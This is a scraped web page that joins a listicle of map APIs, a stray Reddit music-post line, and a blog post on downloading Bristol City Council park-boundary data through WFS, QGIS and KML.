FINOU is a very interactive mapping platform developed in (and for the needs) of the Moroccan market. Its APIs are used to integrate the service on different websites and applications. Developers will obtain tools such as location search, geocoding, map tiles, and more.

AirMap

AirMap consists of tools used to create GIS and a variety of drone management application. Using its APIs, you will have access to notice requirements, advisory information, airspace interaction rules, and much more. Responses are generated in JSON format, for developers who possess the right API key.

An interesting fact is that AirMap sources individual data, and won’t require drone developers and manufacturers to come up with such form their airspace databases. The product belongs to a popular Californian airspace technology company.

ViaMichelin

ViaMichelin’s Web Services & Maps also make their API public and available to developers who use JavaScript. They offer a static library using 4 mapping styles: the native ViaMichelin, hybrid, satellite, and Methods that let users control their layers, polygons, markers, and other elements.

NASA Earth

NASA Earth also provides APIs to make Earth observation data available to all users. The sercie is powered and managed by Google’s Earth Engine, and combines a Landsat 8 image gallery with NASA satellite data being updated in a period of 16 days. Basically, the user can browse through this database for an image of every specific place, taken at a specific day.

Mapme

Mapme API is a RESTful-moderated map builder. At the moment, this service is mounted on Google Maps API, in order to ease the creation, configuration, and distribution of map content. Its custom made apps will include multiple tags, layers, crowdsourcing moderations, privacy settings, activity feeds, mobile compatibility, and many other advanced features.

Detailed documentation and hands-on support for HTTP/HTTPS will also be provided, with responses arriving in JSON formats.

NavVis

If interested to integrate NavVis’s services on your app/website, check out their open APIs. Unfortunately, there is no public info or documentation provided, and you have to create an account in order to obtain a personal key. NavVis can be used both as an indoor navigator and an indoor mapping tool.

One Map

One Map is a Singapore geolocation system that also offers open API to integrate its services on other applications. It works with API key authentication and REST protocols, and invites developers to mash-up its APIs with JavaScript ones, and put in action services such as Agency Data, Address Search, Static Maps, and other advanced mashups.

UKMap

UKMap is the best-known provider of large-scale London maps, which is why many developers want to see its services embedded on their applications. At the moment, UKMap displays more than 100 million info points, among which roads, buildings, pavements, land use and land cover, retail locations, trees, fences, digital terrains, and much more. The service was developed and belongs to The GeoInformation Group, UK.

Mapzen

Mapzen’s Search APIs are devoted to developers who’d like to see this service embedded on their applications. The service will later on become available to visitors and end users, with a free API key that can be obtained by simply contacting the vendor. This makes Mapzen a highly-preferred open-source mapping tool, especially because its search engine operates worldwide, and turns all names and addresses in actual geographic locations (and vice versa).

Pointpin

Pointpin APIs are applied by developers to embed Pointpin services on their sites and applications, and to enable some IP geolocation info for their end users. In order to use these APIs you need a special key, as Pointpin functions as a hosted IP geolocation.

AboutPLACE

AboutPLACE’s RESTful API help developers turn place-based information into an interactive map. Built in Beta, these APIs are available for Miami, Austin, and Boston, and provide all users with unique access keys obtained upon registration.

Developers use these APIs to access local maps, but also metrics, analytics, visualizations, and similar insights on the specified cities. With information like this, they can enhance their own datasets and make results hyper-localized.

If you liked this article with maps APIs, you should check out these articles as well:

Google APIs That You Can Use

12 Useful AngularJS Boilerplates

WordPress boilerplates to use for your themes and plugins

Web APIs for non-programmers

What are the Benefits of APIs?

The post Maps APIs To Use In Your Projects appeared first on Design your way.

from Web Development & Designing http://www.designyourway.net/blog/resources/maps-apis/

The Dahmers - Blood on My Hands [Garage/Punk] (2016) Swedish garage band 

getcape-wearcape-fly posted this to r/listentothis at 2017-03-29 14:15:06 UTC

Accessing GIS data

In addition to the open data provided by Bristol City Council’s Socrata-based https://opendata.bristol.gov.uk portal, BCC also provide documentation on many datasets via https://data.gov.uk which we can find by searching for ‘Bristol’  The list of over 600 sources (actually a large number of Bathymetric data from the UK Hydrographic Office) contains many which are available in CSV or XML format and these are straightforward to access since the documentation contains the URL to fetch the actual data file. Of course there are also some in PDF -nasty! 

However geospatial data such as boundaries of wards or the location of libraries is accessed from the BCC GIS system directly.  These services are described by WFS (Web Feature Service) and WMS (Web Map Service) meta-data files returned as XML.  I have to confess I was confused about how to use these and gave up, until the other day when I needed to access the boundary data for parks and openspaces to be integrated with BristolTrees.  With the help of my friend MT @agreensteam and one of the BCC GIS team, I have finally made some progress.

Park Boundaries

On data.gov.uk, I found an entry called ‘Bristol City Council INSPIRE WFS https://gov.uk/dataset/bristol-city-council-inspire-wfs  [ I confess I’m still unclear what INSPIRE is -seems to be a EU standard?]

which in turn contains a link to the WFS service on the BCC arcgis server (ArcGIS is the leading commercial GIS platform developed by ESRI).

http://maps.bristol.gov.uk/arcgis/services/ext/INSPIRE/MapServer/WFSServer?service=WFS&request=GetCapabilities

In the WFS document, I can see a feature-type called ‘ Parks and greens spaces ’ in the features list but I had no idea how to construct a URL to access this data. My plea for help was answered and MT offered to extract the data for me, and, using a program called QGIS, she sent me the parks data in two formats: shapefile and geojson.  Shapefiles are a directory of  multiple files and looked frightening.  geojson is just a JSON file and I have some code for parsing JSON with XQuery.  However on a file of this size, full parsing failed and although I could drop back to a less formatted version and extract polygon data, processing and conversion of every point to latitude and longitude using my XQuery module was slow.

QGIS to the rescue

Finally I realised that QGIS was free and downloaded the latest version 2.18.4 which includes a WFS interface. The browser version displays GIS information but to export you need the desktop version. 

Under the WFS menu, it was simple to add a new connection by providing the WFS URL. The metadata is loaded and an entry created for each layer ( wfs:FeatureType). Selecting a layer loads the data and displays the areas (wonder where I get a map as a backdrop?). 

Layers can be exported in a wide range of formats. Being familiar with KML, I started with this format. I changed the CRS (Coordinate Reference System) to Conversion to WGS84 and extraction was very fast. I stumbled around trying to get the attributes exported in the name and description fields, following several stale trails from stackoverflow-like advice which pertained to earlier versions of QGIS. Finally I actually looked at the screen and saw the dropdown list ‘Set Fields to Export ..”.  Attribute values are held in a generic XML structure:

                 <SchemaData schemaUrl="#parks1">                        <SimpleData name="Site_name">Queen Square</SimpleData>                        <SimpleData name="Site_code">QUEESQ</SimpleData>                    </SchemaData>

This is difficult to index so after generating the kml and loading into eXist, I reformatted the xml to make selection of a given area faster and more convenient.

These areas are now included in the pages on BristolTrees where there was match.  XQuery converts the polygons to JavaScript in the format needed by google.map.Polygon for access by the JavaScript mapping code.  This is the area of the Avon New Cut (bit short of located trees at present!)

In retrospect, perhaps I shouldn’t have jumped at the first format I recognised. QGIS also exports GPX  and GML.  GPX is no use for this data since it doesn’t support multiple polygons, needed for many of the areas, but GML is a candidate. 

QGIS is an amazing piece of software.  Amongst other capabilities, QGIS can read and display local KML, GML and geojson files, with multiple layers for comparison.  I’m very glad I’ve been introduced to it - thanks MT.

Plain REST URL

Now that I understood more about the interface, I looked again at the meta data and the brief guidance in Wikipedia.  A bit of experimentation led to the URL

http://maps.bristol.gov.uk/arcgis/services/ext/INSPIRE/MapServer/WFSServer?service=WFS&request=GetFeature&TypeName=INSPIREWFS:Parks_and_greens_spaces

(where the value for the TypeName parameter is the wfs:Name of the wfsFeatureType in the WFS document)

to download the GML file directly.  Conversion to lat/long is not supported directly and would have to be done in XQuery, but this does allow GIS data to be loaded directly into the XML database.  Moreover the format of attribute data is more convenient:

     <ogr:OBJECTID>4075</ogr:OBJECTID>      <ogr:Site_name>River Avon Trail West</ogr:Site_name>      <ogr:Site_code>AVONWAWE</ogr:Site_code>      <ogr:UPRN>000000303853</ogr:UPRN>

The guide to the REST URL protocol is here 

http://enterprise.arcgis.com/en/server/latest/publish-services/windows/communicating-with-a-wfs-service-in-a-web-browser.htm

Hand-draw boundaries

For areas for which BCC does not provide boundary data, these may have to be created.  One way is to use Google Earth to hand-draw a path, taking care to close the path, and save as  KML.  KML exported from Google Earth represents the path by a  LineString element rather than a Polygon as exported by QGIS, but the core coordinates element is compatible (that weird longitude, latitude ordering) with an additional altitude value  so it needs to be converted to the MultiGeometry structure used in the QCIS export.

Here is the boundary for our residents-only Morley Square.

opendata.arcgis.com

Joe Brickley at BCC later supplied me with a direct link into the opendata access point on the arcgis platform for the parks data:

http://opendata.arcgis.com/datasets/a37403b31c0e4a5baae47385156efa44_10?geometry=-2.632%2C51.452%2C-2.496%2C51.471

from where the data can be downloaded either as Shapefile (shudder!) or KML. This is even simpler than getting the GML since the coordinate conversion has already been done.  I found that this is an open portal only requiring a free registration. Once logged in and searching amongst the thousands of open datasets there for Bristol, I found the parks data but also datasets on TPOs and a dataset I hadn’t seen before, of Blue Plaques.  This is point data so can be expressed in CSV and here too the coordinates are lat/long. 

There are actually several datasets describing parks and openspaces. Impressively there are the boundaries of every BCC asset, including council houses, and every allotment plot.  My next task is to extract schools to add to BristolTrees but the addition of over 350 boundaries is a nice enrichment.

conclusion

So now I have an embarrassment of ways of getting GIS data - QGIS using WFS metadata  to get any of multiple formats, direct URLs to the BCC arcgis server for GML and access to those sets published to opendata.arcgis.com for KML. Progress!

Postscript May 2019

FILTER

With large datasets, it is either inconvenient or impossible to load the whole feature set (due to limits on the number of returned Features. There seem to be several URL parameters for filtering available but the only way I have found with the version of arcgis set up for BCC is to use the filter parameter with an XML filter definition. 

For example to retrieve an asset from the list of BCC assets,  this filter selects the asset with a Property Reference of 820:

<Filter%20xmlns="http://www.opengis.net/ogc"><PropertyIsEqualTo><PropertyName>INSPIREWFS:Property_reference</PropertyName><Literal>820</Literal></PropertyIsEqualTo></Filter>

Viewing Asset layer

add the Inspire Asset layer

add the OpenStreet Map layer

select the asset layer

use the layer style tab to change the opacity of the asset layer so the OpenStreetMap shows thru

use the Layer/Labeling tab to select which attribute to use as a label - I will use PropertyReference